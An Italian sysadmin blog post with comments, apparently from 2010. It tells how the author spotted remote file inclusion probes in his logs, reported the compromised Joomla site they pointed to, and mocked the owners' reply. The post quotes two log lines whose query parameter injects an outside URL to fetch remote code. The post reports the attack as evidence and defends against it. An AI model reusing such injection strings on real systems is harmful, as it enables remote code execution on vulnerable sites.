Comments & Opinions


Home Page | Comments | Articles | Faq | Documents | Search | Archive | Tales from the Machine Room | Contribute | Set language to:en it | Login/Register


Imbecilli...

Un paio di giorni fa, mentre mi stavo dilettando (per certi valori di 'dilettare') a controllare i millemila logs dei nostri sistemi ho scovato una marea di linee come le seguenti:

91.215.157.104 - - [13/Sep/2010:04:02:39 +0200] "GET /about-us//?site=http://www.rcpamanual.edu.au//language/pdf_fonts/id.txt??? HTTP/1.1" 404 13220

91.215.157.104 - - [13/Sep/2010:04:02:39 +0200] "GET //?site=http://www.rcpamanual.edu.au//language/pdf_fonts/id.txt??? HTTP/1.1" 404 13220

Ho quindi inviato una maillina ai manutentori del dominio indicato (rcpamanual.edu.au) informandoli che il loro sistema era probabilmente p0wned.

Ed oggi mi arriva una maillina di risposta che dice:

"lo sviluppatore del sito aggiornera' ad una nuova versione di Joomla che risolve parecchi problemi, ha controllato ed e' sicuro che tale cosa non ha avuto effetti nefasti. Posso sapere come lo avete scoperto?"

Ed io penso, nell'ordine: a) lo sapevo che da c'era di mezzo una PHMerdaccia da qualche parte b) mi sa che il "problema" e' tra le orecchie dello sviluppatroto e c) perche' io sono capace di leggere un fottuto file di log? Perche' se loro controllassero i loro fottuti files di log forse si renderebbero conto che ci sono un bazilliardo di richieste per files che non dovrebbero essere sul loro sistema... O no?

Imbecilli. Altro che CL.

Davide Bianchi
16/09/2010 09:00

Comments are added when and more important if I have the time to review them and after removing Spam, Crap, Phishing and the like. So don't hold your breath. And if your comment doesn't appear, is probably becuase it wasn't worth it.

9 messages this document does not accept new posts

Anonymous Puzzled

By Anonymous Puzzled posted 16/09/2010 14:08

però quelle richieste hanno un 404, quindi sono richieste a file che non ci sono...

 

o mi sono perso qualche passaggio?

-- Anonymous Puzzled

Davide Bianchi

@ Anonymous Puzzled By Davide Bianchi posted 16/09/2010 15:56

però quelle richieste hanno un 404, quindi sono richieste a file che non ci sono...

il 404 e' dovuto al fatto che il server da cui io ho prelevato il log e' TomCat, pertanto l'URL non viene richiesto. Poi spero che dopo due giorni gli imbecilli di cui sopra abbiano rimosso la fetecchia dal loro sistema, ma non ci giurerei troppo.

-- Davide Bianchi

Nik

By Nik posted 16/09/2010 18:32

ma tu gli hai risposto?

e se sì, come?



laugh

-- Chronicles of a Broken Heart

Davide Bianchi

@ Nik By Davide Bianchi posted 16/09/2010 19:41

ma tu gli hai risposto?

Ovviamente. Gli ho detto che sarebbe interessante capire come c'e' arrivata quella roba sul loro server e che io leggo i file di logs, tutti i giorni.

-- Davide Bianchi

FMblues

By FMblues posted 17/09/2010 13:06

Ciao, sono andato per curiosità sul sito da te indicato.

Nel footer della pagina è indicato da chi è sviluppato il sito, notare il link a cosa porta:

http://www.rcpamanual.edu.au/www.websitesaleslab.com.au

Il problema non è solo che è un php, ma chi lo gestisce non si è manco preso la briga di leggere manuale o guida del suddetto Joomla.

Maurizio

 

-- Tecnico e Responsabile Help Desk

Davide Bianchi

@ FMblues By Davide Bianchi posted 18/09/2010 10:56

 problema non è solo che è un php, ma chi lo gestisce

Ma certo che il problema e' anche chi lo gestisce. Ma chi  sa come gestire le cose credi che scelga la solita cagata che tutti scelgono?

-- Davide Bianchi

Nik

@ Davide Bianchi By Nik posted 20/09/2010 09:28

 problema non è solo che è un php, ma chi lo gestisce

Ma certo che il problema e' anche chi lo gestisce. 

 

Come si suol dire: "fra la sedia e la tastiera......"

 

 

-- Chronicles of a Broken Heart

Sam

By Sam posted 17/09/2010 17:53

Azz... Ti hanno proprio fatto girare, eh?

laughlaughlaugh

E' la prima volta che vedo scrivere al buon D nome e cognome dei personaggi! Ma quando ci vuole... ci vuole!

-- Sam

Rggb

By Rggb posted 20/09/2010 09:19

"lo sviluppatore del sito aggiornera' ad una nuova versione di Joomla che risolve parecchi problemi, ha controllato ed e' sicuro che tale cosa non ha avuto effetti nefasti. Posso sapere come lo avete scoperto?"

:)

Ma scusa, potevi anche mandarli un po' nel pallone, tipo "ho un sw di analisi sviluppato in collaborazione di un team di ricerca della UCLA che è in testing anche presso l'ufficio federale investigativo sui crimini informatici USA, che avvisa istantaneamente in caso di segnalazioni sospette"...

-- Rggb

9 messages this document does not accept new posts

Previous Next


This site is made by me with blood, sweat and gunpowder, if you want to republish or redistribute any part of it, please drop me (or the author of the article if is not me) a mail.


This site was composed with VIM, now is composed with VIM and the (in)famous CMS FdT.

This site isn't optimized for vision with any specific browser, nor it requires special fonts or resolution.
You're free to see it as you wish.

Web Interoperability Pleadge Support This Project
Powered By Gojira